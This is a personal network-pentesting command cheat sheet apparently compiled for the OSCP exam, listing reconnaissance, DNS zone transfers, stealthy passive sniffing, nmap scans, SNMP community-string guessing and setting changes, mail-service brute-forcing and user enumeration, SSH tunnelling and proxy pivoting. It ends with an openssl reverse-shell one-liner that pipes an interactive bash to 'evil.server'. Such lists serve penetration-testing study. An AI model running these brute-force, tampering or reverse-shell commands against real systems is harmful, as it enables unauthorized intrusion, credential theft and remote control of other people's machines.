|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     

Last changed: 08.07.2020

Network pentesting

I started this commandlist for my Offensive Security Certified Professional exam. It summarizes some means to collect data and exploit vulnerabilities in a target network.

open source information

Search engines and public databases can be helpful to find additional information about the target network as well as email addresses of employees.

target information

whois <domain>
whois <target_ip>
geoiplookup <target_ip>

search engine research

theharvester -d target.com -p all -l 200

bing ip search


dns lookup

dig target.com
dig -t aaaa target.com
dig -t axfr target.com @ns.target.com
fierce -dns target.com
dnsenum -f <dictfile> <domain>

dynamic dns update

> server
> local
> update delete server.target.com. A
> update add server.target.com. 86400 A
> send

autonomous system information

Information about autonomous systems can be found with whois or on http://ftp.arin.net/info/asn.txt or with https://www.ultratools.com/tools/asnInfo

whois <asn>

public ip address

whereami from my netstuff repository shows some information about your current public ip address


passive network sniffing

If you are inside the network and want to avoid detection passive sniffing will supply information about network clients without any interaction. Make sure that your machine is not requesting an ip via dhcp or sending ipv6 router/neighbor solicitations


systemclt stop NetworkManager
killall dhclient
sysctl -w net.ipv6.conf.all.autoconf=0
sysctl -w net.ipv6.conf.all.accept_ra=0

dump traffic

tcpdump -i eth0 -X -s 262144 -o dump.pcap

monitor dns requests

passivedns -i eth0 -l /dev/stdout

passive os fingerprinting

p0f -i eth0 -o outfile

traffic analysis

To analyze the tcp streams in a pcap you can use tshark

tshark -r dump.pcap -z conv,tcp -q | sed '1,5d;$d' | awk '{print $10 " " $1 " " $2 " " $3}' | sort -g | awk '{print NR-1,$0}'
tshark -r dump.pcap -z follow,tcp,ascii,0 -q

network scanning

dynamic host configuration protocol

In my netstuff repository I have a small script using scapy to send a single DHCP packet. This way some network information can be retrieved.

dhcp_discover eth0

address resolution protocol

With scapy you can easily send ARP and RARP requests.

srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=TARGET_IP,psrc=''))[0].show()
srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(psrc='',op=3,hwdst=TARGET_MAC))[0].show()

host discovery

nmap -sn
nmap -p 139 -oG grepable_output.txt
ping -I eth0 ff02::1
ping -I eth0 ff02::2


nmap -sS -p1-65535
nmap -sU -p1-65535
proxychains -n -Pn -sT -p445,3389,5985

os detection

nmap -O -sV

finding transparent proxies

nmap -Pn <some_extern_host> --ttl 2 -T5

transport layer security

You can retrieve the TLS certificate with openssl. In case the server requires Server Name Indication (SNI) you will have to use -servername.

openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -fingerprint
openssl s_client -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -connect <target>:<port> -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -in /dev/stdin -text
openssl s_client -showcerts -connect <target>:<port> </dev/null 2>/dev/null | openssl x509 -outform PEM > cert.pem

simple network management protocol

SNMP can be exploited for information gathering and, if you are lucky, to change settings on the host. The community strings of SNMPv1 and SNMPv2c get transmitted in clear text.

guess community string

nmap -Pn -sU <target> -p 161 --script=snmp-brute
onesixtyone -c <dictfile> -i <ip_list>

information gathering

To translate the OIDs in textual form the package snmp-mibs-downloader might be needed.

snmpwalk -c public -v 2c -m ALL <target> 1
snmp-check -c public -v 2c <target>
nmap -Pn -sU <target> -p 161 --script=snmp-interfaces.nse
nmap -Pn -sU <target> -p 161 --script=snmp-processes.nse
nmap -Pn -sU <target> -p 161 --script=snmp-netstat.nse

change settings

snmpset -mALL -v1 -c secret <target> sysName.0 s hacked.host
snmpget -mALL -v1 -c secret <target> sysName.0

file transfer protocol

curl ftp://user:password@server.com
curl ftp://user:password@server.com/file.txt -o file.txt
curl ftp://user:password@server.com -Q '-DELE file.txt'

preboot execution environment

In an preboot execution environment(pxe) the hosts download boot their operating system from a server in the network. These files can be downloaded manually to examine the content. The needed locations can be found in the dhcp packets.

download pxe binary

tftp <next-server-ip-address>
get <boot-file-name>

extract config file name

strings <boot-file-name> | grep -i tftp -A1
tftp <next-server-ip-address>
get <config file>/default

download kernel and initrd

tftp <next-server-ip-address>
get <vmlinuz-file-from-config>
get <initrd-file-from-config>

mount network block device

modprobe nbd
nbd-client <target> -N /device/name /dev/nbd0 -persist
mount /dev/nbd0 /mnt/nbd

universal plug and play

discover services

echo -e 'M-SEARCH * HTTP/1.1\r\nHOST:\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:rootdevice\r\n\r\n' | nc -uw 1 <target> 1900
echo -e 'M-SEARCH * HTTP/1.1\r\nHOST:\r\nMan: "ssdp:discover"\r\nMX: 10\r\nST: upnp:all\r\n\r\n' | nc -uw 1 <target> 1900

get service control point definition


simple object access protocol example

POST /igdupnp/control/WANIPConn1 HTTP/1.1
Accept-Encoding: identity
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Connection: close
Content-Type: text/xml
Content-Length: 300

<?xml version="1.0"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="urn:schemas-upnp-org:service:WANIPConnection:1">
    <m:getexternalipaddress xmlns:m="http://schemas.xmlsoap.org/soap/envelope/">

simple mail transfer protocol

find mail server

dig -t mx <target>

get own domain name

dig -x `curl -s ifconfig.co` | grep -A1 "ANSWER SECTION"

spoofing protection

To check SPF and DMARC settings spoofcheck can be used

python2 spoofcheck.py target.com

manual tls connect

openssl s_client -connect <target>:<port> -ign_eof
HELO my.domain.name
MAIL FROM: <nobody@tempmail.de>
RCPT TO: <admin@shitmail.de>
Subject: foobar


nmap scanning scripts

nmap -Pn -script smtp-commands <target> -p <port>
nmap -Pn -script smtp-open-relay <target> -p <port>
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={EXPN}'
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={VRFY}'
nmap -Pn -script smtp-enum-users <target> -p <port> -script-args 'methods={RCPT}'
nmap -Pn -script smtp-brute <target> -p <port>

enumerate users

smtp-user-enum -M RCPT -U <userlist> -D <target.domain> -t <host>

post office protocol (POP3) and internet message access protocol (IMAP)

nmap scanning scripts

nmap -Pn -script pop3-capabilites <target> -p <port>
nmap -Pn -script pop3-brute <target> -p <port>
nmap -Pn -script imap-capabilites <target> -p <port>
nmap -Pn -script imap-brute <target> -p <port>

netbios discovery

nbtscan -r
nmap --script smb-enum-users.nse
nmap --script smb-check-vulns.nse
rpcclient -U ""


clear to ssl forwarding

socat TCP4-LISTEN:25,fork,reuseaddr OPENSSL:target.com:465,verify=0

IPv4 to IPv6 forwarding

socat TCP4-LISTEN:25,fork,reuseaddr TCP6:target.com:25

local tunnel (opens 31337 on client)

ssh -g -L 31337:target:445 user@ssh-server
plink.exe -g -L 31337:target:445 -l user -pw password ssh-server

remote tunnel (opens 31337 on server)

ssh -R 31337:target:445 user@ssh-server
plink.exe -R 31337:target:445 -l user -pw password ssh-server

To allow connections from other hosts you have to enable GatewayPorts yes in /etc/ssh/sshd_config on the server.

socks proxy

ssh -D 9050 user@ssh-server
vim /etc/proxychains.conf
proxychains nmap -Pn target -p 22

Be aware that UDP will bypass proxychains

openssl backconnect shell

start server

openssl req -x509 -nodes -sha256 -subj "/CN=evil.server" -newkey rsa:2048 -keyout evil.pem -out evil.pem
openssl s_server -cert evil.pem

start client

mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect evil.server:4433 > /tmp/s; rm /tmp/s

Other reverse shell commands can be found at pentestmonkey.net and highon.coffee.